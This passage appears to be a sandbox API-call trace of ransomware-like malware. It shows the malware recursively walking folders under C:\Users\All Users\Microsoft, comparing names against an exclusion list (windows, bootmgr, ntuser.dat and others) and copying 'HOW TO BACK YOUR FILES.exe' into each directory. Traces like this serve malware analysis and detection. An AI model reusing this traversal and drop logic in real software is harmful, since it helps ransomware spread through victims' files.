ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.053] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.053] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.053] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.053] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.053] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.053] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.053] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.053] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.053] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.053] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.053] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.053] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.053] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0089.053] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Microsoft\\NetFramework" [0089.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df890 | out: hHeap=0x2b0000) returned 1 [0089.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0089.053] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework") returned 41 [0089.053] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Microsoft\\NetFramework" [0089.053] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.053] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\netframework\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.054] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.054] GetLastError () returned 0x0 [0089.054] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.054] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.054] CloseHandle (hObject=0x120) returned 1 [0089.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.054] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.055] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.055] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.055] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.055] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.055] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.055] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.055] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.055] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.055] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.055] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="aoldtz.exe") returned 1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="windows") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="bootmgr") returned 1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="temp") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="pagefile.sys") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="boot") returned 1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="ids.txt") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="ntuser.dat") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="perflogs") returned -1 [0089.055] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="MSBuild") returned -1 [0089.055] lstrlenW (lpString="BreadcrumbStore") returned 15 [0089.055] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework\\*") returned 43 [0089.055] lstrcpyW (in: lpString1=0x2cce454, lpString2="BreadcrumbStore" | out: lpString1="BreadcrumbStore") returned="BreadcrumbStore" [0089.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0089.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1608 [0089.055] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0089.056] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.056] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.056] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.056] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.056] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0089.056] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0089.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0089.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0089.056] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0089.056] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0089.056] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.056] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.056] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.057] GetLastError () returned 0x0 [0089.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.057] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.057] CloseHandle (hObject=0x120) returned 1 [0089.057] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.057] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.057] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.057] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.057] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.057] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.057] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.057] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.057] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.057] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.057] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.057] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.057] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.057] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.057] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.057] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0089.057] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\MSDN", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\MSDN") returned="C:\\Users\\All Users\\Microsoft\\MSDN" [0089.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eea10 | out: hHeap=0x2b0000) returned 1 [0089.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0089.058] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MSDN") returned 33 [0089.058] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\MSDN" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MSDN") returned="C:\\Users\\All Users\\Microsoft\\MSDN" [0089.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\msdn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.058] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.058] GetLastError () returned 0x0 [0089.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.058] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.058] CloseHandle (hObject=0x120) returned 1 [0089.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.059] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.059] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.059] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.059] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.059] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.059] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.059] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.059] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.059] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.059] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="aoldtz.exe") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2=".") returned 1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="..") returned 1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="windows") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="bootmgr") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="temp") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="pagefile.sys") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="boot") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="ids.txt") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="ntuser.dat") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="perflogs") returned -1 [0089.059] lstrcmpiW (lpString1="8.0", lpString2="MSBuild") returned -1 [0089.059] lstrlenW (lpString="8.0") returned 3 [0089.059] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MSDN\\*") returned 35 [0089.059] lstrcpyW (in: lpString1=0x2cce444, lpString2="8.0" | out: lpString1="8.0") returned="8.0" [0089.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0089.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4c) returned 0x2ed8a0 [0089.060] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0089.060] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.060] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.060] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c635a60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.060] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.060] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0089.060] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0") returned="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0" [0089.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0089.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0089.060] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0") returned 37 [0089.060] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0") returned="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0" [0089.060] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.060] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\msdn\\8.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.061] GetLastError () returned 0x0 [0089.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.061] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.061] CloseHandle (hObject=0x120) returned 1 [0089.061] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.061] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 